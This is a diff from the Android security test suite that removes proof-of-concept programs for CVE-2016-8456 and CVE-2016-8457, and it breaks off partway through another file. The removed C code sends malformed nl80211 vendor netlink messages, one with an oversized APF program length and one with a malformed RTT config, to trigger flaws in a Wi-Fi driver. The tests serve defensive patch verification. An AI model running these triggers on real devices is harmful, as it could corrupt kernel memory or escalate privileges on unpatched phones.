-#include <dlfcn.h>
-#include <errno.h>
-#include <limits.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <android/log.h>
-#include <sys/socket.h>
-#include <linux/netlink.h>
-#include <linux/genetlink.h>
-#include <string.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-#include <dirent.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <sys/ioctl.h>
-#include <net/if.h>
-#include <sys/types.h>
-#include <netlink/msg.h>
-#include <netlink/genl/genl.h>
-#include <netlink/genl/ctrl.h>
-#include <linux/nl80211.h>
-
-#define MAX_MSG_SIZE 2048
-#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
-#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
-
-struct kgsl_perfcounter_query_compat {
- unsigned int groupid;
- unsigned int countables;
- unsigned int count;
- unsigned int max_counters;
- unsigned int __pad[2];
-};
-struct kgsl_perfcounter_read_group {
- unsigned int groupid;
- unsigned int countable;
- unsigned long long value;
-};
-#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
- _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
-
-struct kgsl_perfcounter_read_compat {
- unsigned int reads;
- unsigned int count;
- unsigned int __pad[2];
-};
-
-#define CAL_IOCTL_MAGIC 'a'
-
-#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
-
-#define NL80211_ATTR_MAC 6
-#define ETH_ALEN 6
-
-struct nl_sock *nl_sk;
-#define NL80211_ATTR_IFINDEX 3
-enum wlan_hdd_tm_attr {
- WLAN_HDD_TM_ATTR_INVALID = 0,
- WLAN_HDD_TM_ATTR_CMD = 1,
- WLAN_HDD_TM_ATTR_DATA = 2,
- WLAN_HDD_TM_ATTR_STREAM_ID = 3,
- WLAN_HDD_TM_ATTR_TYPE = 4,
- /* keep last */
- WLAN_HDD_TM_ATTR_AFTER_LAST,
- WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
-};
-
-enum wlan_hdd_tm_cmd {
- WLAN_HDD_TM_CMD_WLAN_FTM = 0,
- WLAN_HDD_TM_CMD_WLAN_HB = 1,
-};
-
-typedef enum {
- /* don't use 0 as a valid subcommand */
- VENDOR_NL80211_SUBCMD_UNSPECIFIED,
-
- /* define all vendor startup commands between 0x0 and 0x0FFF */
- VENDOR_NL80211_SUBCMD_RANGE_START = 0x0001,
- VENDOR_NL80211_SUBCMD_RANGE_END = 0x0FFF,
-
- /* define all GScan related commands between 0x1000 and 0x10FF */
- ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START = 0x1000,
- ANDROID_NL80211_SUBCMD_GSCAN_RANGE_END = 0x10FF,
-
- /* define all RTT related commands between 0x1100 and 0x11FF */
- ANDROID_NL80211_SUBCMD_RTT_RANGE_START = 0x1100,
- ANDROID_NL80211_SUBCMD_RTT_RANGE_END = 0x11FF,
-
- ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START = 0x1200,
- ANDROID_NL80211_SUBCMD_LSTATS_RANGE_END = 0x12FF,
-
- ANDROID_NL80211_SUBCMD_TDLS_RANGE_START = 0x1300,
- ANDROID_NL80211_SUBCMD_TDLS_RANGE_END = 0x13FF,
-
- ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START = 0x1400,
- ANDROID_NL80211_SUBCMD_DEBUG_RANGE_END = 0x14FF,
-
- /* define all NearbyDiscovery related commands between 0x1500 and 0x15FF */
- ANDROID_NL80211_SUBCMD_NBD_RANGE_START = 0x1500,
- ANDROID_NL80211_SUBCMD_NBD_RANGE_END = 0x15FF,
-
- /* define all wifi calling related commands between 0x1600 and 0x16FF */
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START = 0x1600,
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_END = 0x16FF,
-
- /* define all NAN related commands between 0x1700 and 0x17FF */
- ANDROID_NL80211_SUBCMD_NAN_RANGE_START = 0x1700,
- ANDROID_NL80211_SUBCMD_NAN_RANGE_END = 0x17FF,
-
- /* define all packet filter related commands between 0x1800 and 0x18FF */
- ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START = 0x1800,
- ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_END = 0x18FF,
-
- /* This is reserved for future usage */
-
-} ANDROID_VENDOR_SUB_COMMAND;
-
-enum wl_vendor_subcmd {
- BRCM_VENDOR_SCMD_UNSPEC,
- BRCM_VENDOR_SCMD_PRIV_STR,
- GSCAN_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START,
- GSCAN_SUBCMD_SET_CONFIG,
- GSCAN_SUBCMD_SET_SCAN_CONFIG,
- GSCAN_SUBCMD_ENABLE_GSCAN,
- GSCAN_SUBCMD_GET_SCAN_RESULTS,
- GSCAN_SUBCMD_SCAN_RESULTS,
- GSCAN_SUBCMD_SET_HOTLIST,
- GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
- GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
- GSCAN_SUBCMD_GET_CHANNEL_LIST,
- ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
- ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
- ANDR_WIFI_RANDOM_MAC_OUI,
- ANDR_WIFI_NODFS_CHANNELS,
- ANDR_WIFI_SET_COUNTRY,
- GSCAN_SUBCMD_SET_EPNO_SSID,
- WIFI_SUBCMD_SET_SSID_WHITELIST,
- WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
- WIFI_SUBCMD_ENABLE_LAZY_ROAM,
- WIFI_SUBCMD_SET_BSSID_PREF,
- WIFI_SUBCMD_SET_BSSID_BLACKLIST,
- GSCAN_SUBCMD_ANQPO_CONFIG,
- WIFI_SUBCMD_SET_RSSI_MONITOR,
- WIFI_SUBCMD_CONFIG_ND_OFFLOAD,
- RTT_SUBCMD_SET_CONFIG = ANDROID_NL80211_SUBCMD_RTT_RANGE_START,
- RTT_SUBCMD_CANCEL_CONFIG,
- RTT_SUBCMD_GETCAPABILITY,
- RTT_SUBCMD_GETAVAILCHANNEL,
- RTT_SUBCMD_SET_RESPONDER,
- RTT_SUBCMD_CANCEL_RESPONDER,
- LSTATS_SUBCMD_GET_INFO = ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START,
- DEBUG_START_LOGGING = ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START,
- DEBUG_TRIGGER_MEM_DUMP,
- DEBUG_GET_MEM_DUMP,
- DEBUG_GET_VER,
- DEBUG_GET_RING_STATUS,
- DEBUG_GET_RING_DATA,
- DEBUG_GET_FEATURE,
- DEBUG_RESET_LOGGING,
- DEBUG_TRIGGER_DRIVER_MEM_DUMP,
- DEBUG_GET_DRIVER_MEM_DUMP,
- DEBUG_START_PKT_FATE_MONITORING,
- DEBUG_GET_TX_PKT_FATES,
- DEBUG_GET_RX_PKT_FATES,
- DEBUG_GET_WAKE_REASON_STATS,
- WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE =
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START,
- WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
- APF_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START,
- APF_SUBCMD_SET_FILTER,
- /* Add more sub commands here */
- VENDOR_SUBCMD_MAX
-};
-
-#define QCA_NL80211_VENDOR_ID 0x001374
-#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
-#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
-#define QCA_NL80211_VENDOR_SUBCMD_PACKET_FILTER 83
-
-#define BPF_SET_RESET 1
-#define BPF_FILTER_ID 3
-#define BPF_PACKET_SIZE 4
-#define BPF_PROGRAM 6
-#define QCA_WLAN_GET_PACKET_FILTER 2
-
-#define GSCAN_ATTRIBUTE_NUM_BUCKETS 10
-#define GSCAN_ATTRIBUTE_CH_BUCKET_1 0
-#define GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS 15
-
-#define RTT_ATTRIBUTE_TARGET_CNT 0
-#define RTT_ATTRIBUTE_TARGET_CHAN 5
-#define RTT_ATTRIBUTE_TARGET_INFO 1
-
-#define GSCAN_ATTRIBUTE_WHITELIST_SSID 80
-#define GSCAN_ATTRIBUTE_NUM_WL_SSID 81
-#define GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM 84
-typedef int wifi_channel;
-typedef int wifi_channel_width_t;
-typedef struct wifi_channel_info {
- wifi_channel_width_t width;
- wifi_channel center_freq; /* primary 20 MHz channel */
- wifi_channel center_freq0; /* center freq (MHz) first segment */
- wifi_channel
- center_freq1; /* center freq (MHz) second segment valid for 80 + 80 */
-} wifi_channel_info_t;
-
-#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE 111
-#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST 110
-#define GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID 114
-#define GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM 113
-
-#define APF_ATTRIBUTE_PROGRAM_LEN 3
-int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
- u_int8_t genl_version);
-int test(void);
-
-int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
- u_int8_t genl_version) {
- struct nl_msg *msg;
- int ret = -1;
- unsigned char dst[ETH_ALEN];
- struct nlattr *rret;
- struct nlattr *rret2;
- struct nlattr *rret3;
- struct nlattr *rret4;
- unsigned char buf_test[256];
-
- int i = 0;
-
- wifi_channel_info_t c_info;
-
- unsigned char hb_params[512];
-#define DOT11_MAX_SSID_LEN 32
- unsigned char SSID11[DOT11_MAX_SSID_LEN];
- struct nl80211_sta_flag_update flags;
-
- msg = nlmsg_alloc();
- int if_index = if_nametoindex("wlan0");
-
-#define OUI_GOOGLE 0x001A11
-
- genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
-
- nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
-
- nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
-
- nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, APF_SUBCMD_SET_FILTER);
-
- rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
-
- if (!rret) {
- return 1;
- }
-
- nla_put_u32(msg, APF_ATTRIBUTE_PROGRAM_LEN, 0xffffffff);
-
- nla_nest_end(msg, rret);
-
- ret = nl_send_auto_complete(nl_sk, msg);
-
- return 0;
-}
-
-#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
-#define AID_NET_RAW 3004 /* can create raw INET sockets */
-#define AID_NET_ADMIN 3005
-
-int test() {
- int fd = 0;
- int i = 0;
- int j = 0;
- int ret = 0;
- char *mem;
- int family_id = 0;
- struct audio_cal_basic *acb;
- struct sockaddr_nl saddr;
- int test = 0x1234;
-
- gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
- setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
-
- setuid(2000);
-
- nl_sk = nl_socket_alloc();
- ret = genl_connect(nl_sk);
- if (ret != 0) {
- return -1;
- }
-
- family_id = genl_ctrl_resolve(nl_sk, "nl80211");
-
- ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
-
- return 0;
-}
-
-int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8456/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8456/Android.mk
deleted file mode 100644
index 75688b5..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8456/Android.mk
+++ /dev/null
@@ -1,37 +0,0 @@
-# Copyright (C) 2017 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8456
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := libnl
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
-LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
-LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
-LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
-LOCAL_CFLAGS += -Iinclude -fPIE
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8456/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8456/poc.c
deleted file mode 100644
index 9367c45..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8456/poc.c
+++ /dev/null
@@ -1,313 +0,0 @@
-/**
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#define _GNU_SOURCE
-#include <dlfcn.h>
-#include <errno.h>
-#include <limits.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <android/log.h>
-#include <sys/socket.h>
-#include <linux/netlink.h>
-#include <linux/genetlink.h>
-#include <string.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-#include <dirent.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <sys/ioctl.h>
-#include <net/if.h>
-#include <sys/types.h>
-#include <netlink/msg.h>
-#include <netlink/genl/genl.h>
-#include <netlink/genl/ctrl.h>
-#include <linux/nl80211.h>
-
-#define MAX_MSG_SIZE 1024
-#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
-#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
-
-struct kgsl_perfcounter_query_compat {
- unsigned int groupid;
- unsigned int countables;
- unsigned int count;
- unsigned int max_counters;
- unsigned int __pad[2];
-};
-struct kgsl_perfcounter_read_group {
- unsigned int groupid;
- unsigned int countable;
- unsigned long long value;
-};
-#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
- _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
-
-struct kgsl_perfcounter_read_compat {
- unsigned int reads;
- unsigned int count;
- unsigned int __pad[2];
-};
-
-#define CAL_IOCTL_MAGIC 'a'
-
-#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
-
-#define NL80211_ATTR_MAC 6
-#define ETH_ALEN 6
-
-struct nl_sock *nl_sk;
-#define NL80211_ATTR_IFINDEX 3
-enum wlan_hdd_tm_attr {
- WLAN_HDD_TM_ATTR_INVALID = 0,
- WLAN_HDD_TM_ATTR_CMD = 1,
- WLAN_HDD_TM_ATTR_DATA = 2,
- WLAN_HDD_TM_ATTR_STREAM_ID = 3,
- WLAN_HDD_TM_ATTR_TYPE = 4,
- /* keep last */
- WLAN_HDD_TM_ATTR_AFTER_LAST,
- WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
-};
-
-enum wlan_hdd_tm_cmd {
- WLAN_HDD_TM_CMD_WLAN_FTM = 0,
- WLAN_HDD_TM_CMD_WLAN_HB = 1,
-};
-
-typedef enum {
- /* don't use 0 as a valid subcommand */
- VENDOR_NL80211_SUBCMD_UNSPECIFIED,
-
- /* define all vendor startup commands between 0x0 and 0x0FFF */
- VENDOR_NL80211_SUBCMD_RANGE_START = 0x0001,
- VENDOR_NL80211_SUBCMD_RANGE_END = 0x0FFF,
-
- /* define all GScan related commands between 0x1000 and 0x10FF */
- ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START = 0x1000,
- ANDROID_NL80211_SUBCMD_GSCAN_RANGE_END = 0x10FF,
-
- /* define all RTT related commands between 0x1100 and 0x11FF */
- ANDROID_NL80211_SUBCMD_RTT_RANGE_START = 0x1100,
- ANDROID_NL80211_SUBCMD_RTT_RANGE_END = 0x11FF,
-
- ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START = 0x1200,
- ANDROID_NL80211_SUBCMD_LSTATS_RANGE_END = 0x12FF,
-
- ANDROID_NL80211_SUBCMD_TDLS_RANGE_START = 0x1300,
- ANDROID_NL80211_SUBCMD_TDLS_RANGE_END = 0x13FF,
-
- ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START = 0x1400,
- ANDROID_NL80211_SUBCMD_DEBUG_RANGE_END = 0x14FF,
-
- /* define all NearbyDiscovery related commands between 0x1500 and 0x15FF */
- ANDROID_NL80211_SUBCMD_NBD_RANGE_START = 0x1500,
- ANDROID_NL80211_SUBCMD_NBD_RANGE_END = 0x15FF,
-
- /* define all wifi calling related commands between 0x1600 and 0x16FF */
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START = 0x1600,
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_END = 0x16FF,
-
- /* define all NAN related commands between 0x1700 and 0x17FF */
- ANDROID_NL80211_SUBCMD_NAN_RANGE_START = 0x1700,
- ANDROID_NL80211_SUBCMD_NAN_RANGE_END = 0x17FF,
-
- /* define all packet filter related commands between 0x1800 and 0x18FF */
- ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START = 0x1800,
- ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_END = 0x18FF,
-
- /* This is reserved for future usage */
-
-} ANDROID_VENDOR_SUB_COMMAND;
-
-enum wl_vendor_subcmd {
- BRCM_VENDOR_SCMD_UNSPEC,
- BRCM_VENDOR_SCMD_PRIV_STR,
- GSCAN_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START,
- GSCAN_SUBCMD_SET_CONFIG,
- GSCAN_SUBCMD_SET_SCAN_CONFIG,
- GSCAN_SUBCMD_ENABLE_GSCAN,
- GSCAN_SUBCMD_GET_SCAN_RESULTS,
- GSCAN_SUBCMD_SCAN_RESULTS,
- GSCAN_SUBCMD_SET_HOTLIST,
- GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
- GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
- GSCAN_SUBCMD_GET_CHANNEL_LIST,
- ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
- ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
- ANDR_WIFI_RANDOM_MAC_OUI,
- ANDR_WIFI_NODFS_CHANNELS,
- ANDR_WIFI_SET_COUNTRY,
- GSCAN_SUBCMD_SET_EPNO_SSID,
- WIFI_SUBCMD_SET_SSID_WHITELIST,
- WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
- WIFI_SUBCMD_ENABLE_LAZY_ROAM,
- WIFI_SUBCMD_SET_BSSID_PREF,
- WIFI_SUBCMD_SET_BSSID_BLACKLIST,
- GSCAN_SUBCMD_ANQPO_CONFIG,
- WIFI_SUBCMD_SET_RSSI_MONITOR,
- WIFI_SUBCMD_CONFIG_ND_OFFLOAD,
- RTT_SUBCMD_SET_CONFIG = ANDROID_NL80211_SUBCMD_RTT_RANGE_START,
- RTT_SUBCMD_CANCEL_CONFIG,
- RTT_SUBCMD_GETCAPABILITY,
- RTT_SUBCMD_GETAVAILCHANNEL,
- RTT_SUBCMD_SET_RESPONDER,
- RTT_SUBCMD_CANCEL_RESPONDER,
- LSTATS_SUBCMD_GET_INFO = ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START,
- DEBUG_START_LOGGING = ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START,
- DEBUG_TRIGGER_MEM_DUMP,
- DEBUG_GET_MEM_DUMP,
- DEBUG_GET_VER,
- DEBUG_GET_RING_STATUS,
- DEBUG_GET_RING_DATA,
- DEBUG_GET_FEATURE,
- DEBUG_RESET_LOGGING,
- DEBUG_TRIGGER_DRIVER_MEM_DUMP,
- DEBUG_GET_DRIVER_MEM_DUMP,
- DEBUG_START_PKT_FATE_MONITORING,
- DEBUG_GET_TX_PKT_FATES,
- DEBUG_GET_RX_PKT_FATES,
- DEBUG_GET_WAKE_REASON_STATS,
- WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE =
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START,
- WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
- APF_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START,
- APF_SUBCMD_SET_FILTER,
- /* Add more sub commands here */
- VENDOR_SUBCMD_MAX
-};
-
-#define QCA_NL80211_VENDOR_ID 0x001374
-#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
-#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
-#define QCA_NL80211_VENDOR_SUBCMD_PACKET_FILTER 83
-
-#define BPF_SET_RESET 1
-#define BPF_FILTER_ID 3
-#define BPF_PACKET_SIZE 4
-#define BPF_PROGRAM 6
-#define QCA_WLAN_GET_PACKET_FILTER 2
-
-#define GSCAN_ATTRIBUTE_NUM_BUCKETS 10
-#define GSCAN_ATTRIBUTE_CH_BUCKET_1 0
-#define GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS 15
-
-#define RTT_ATTRIBUTE_TARGET_CNT 0
-#define RTT_ATTRIBUTE_TARGET_CHAN 5
-#define RTT_ATTRIBUTE_TARGET_INFO 1
-typedef int wifi_channel;
-typedef int wifi_channel_width_t;
-typedef struct wifi_channel_info {
- wifi_channel_width_t width;
- wifi_channel center_freq; /* primary 20 MHz channel */
- wifi_channel center_freq0; /* center freq (MHz) first segment */
- wifi_channel
- center_freq1; /* center freq (MHz) second segment valid for 80 + 80 */
-} wifi_channel_info_t;
-
-int test(void);
-int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
- u_int8_t genl_version);
-
-int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
- u_int8_t genl_version) {
- struct nl_msg *msg;
- int ret = -1;
- unsigned char dst[ETH_ALEN];
- struct nlattr *rret;
- struct nlattr *rret2;
- unsigned char oper_classes[253];
-
- wifi_channel_info_t c_info;
-
- unsigned char hb_params[512];
-
- struct nl80211_sta_flag_update flags;
-
- msg = nlmsg_alloc();
- int if_index = if_nametoindex("wlan0");
-
-#define OUI_GOOGLE 0x001A11
-
- genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
-
- nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
-
- nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
-
- nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, RTT_SUBCMD_SET_CONFIG);
-
- rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
-
- if (!rret) {
- return 1;
- }
-
- nla_put_u8(msg, RTT_ATTRIBUTE_TARGET_CNT, 0);
-
- rret2 = nla_nest_start(msg, RTT_ATTRIBUTE_TARGET_INFO);
-
- if (!rret2) {
- return 1;
- }
-
- nla_put(msg, RTT_ATTRIBUTE_TARGET_CHAN, sizeof(c_info), &c_info);
-
- nla_nest_end(msg, rret2);
-
- nla_nest_end(msg, rret);
-
- ret = nl_send_auto_complete(nl_sk, msg);
-
- return 0;
-}
-
-#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
-#define AID_NET_RAW 3004 /* can create raw INET sockets */
-#define AID_NET_ADMIN 3005
-
-int test() {
- int fd = 0;
- int i = 0;
- int j = 0;
- int ret = 0;
- char *mem;
- int family_id = 0;
- struct audio_cal_basic *acb;
- struct sockaddr_nl saddr;
- int test = 0x1234;
-
- gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
- setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
-
- setuid(2000);
-
- nl_sk = nl_socket_alloc();
- ret = genl_connect(nl_sk);
- if (ret != 0) {
- return -1;
- }
-
- family_id = genl_ctrl_resolve(nl_sk, "nl80211");
-
- ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
-
- return 0;
-}
-
-int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8457/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8457/Android.mk
deleted file mode 100644
index 3ec6a31..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8457/Android.mk
+++ /dev/null
@@ -1,37 +0,0 @@
-# Copyright (C) 2017 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8457
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := libnl
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
-LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
-LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
-LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
-LOCAL_CFLAGS += -Iinclude -fPIE
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8457/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8457/poc.c
deleted file mode 100644
index 9a9f02b..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8457/poc.c
+++ /dev/null
@@ -1,335 +0,0 @@
-/**
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#define _GNU_SOURCE
-#include <dlfcn.h>
-#include <errno.h>
-#include <limits.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <android/log.h>
-#include <sys/socket.h>
-#include <linux/netlink.h>
-#include <linux/genetlink.h>
-#include <string.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-#include <dirent.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <sys/ioctl.h>
-#include <net/if.h>
-#include <sys/types.h>
-#include <netlink/msg.h>
-#include <netlink/genl/genl.h>
-#include <netlink/genl/ctrl.h>
-#include <linux/nl80211.h>
-
-#define MAX_MSG_SIZE 2048
-#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
-#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
-
-struct kgsl_perfcounter_query_compat {
- unsigned int groupid;
- unsigned int countables;
- unsigned int count;
- unsigned int max_counters;
- unsigned int __pad[2];
-};
-struct kgsl_perfcounter_read_group {
- unsigned int groupid;
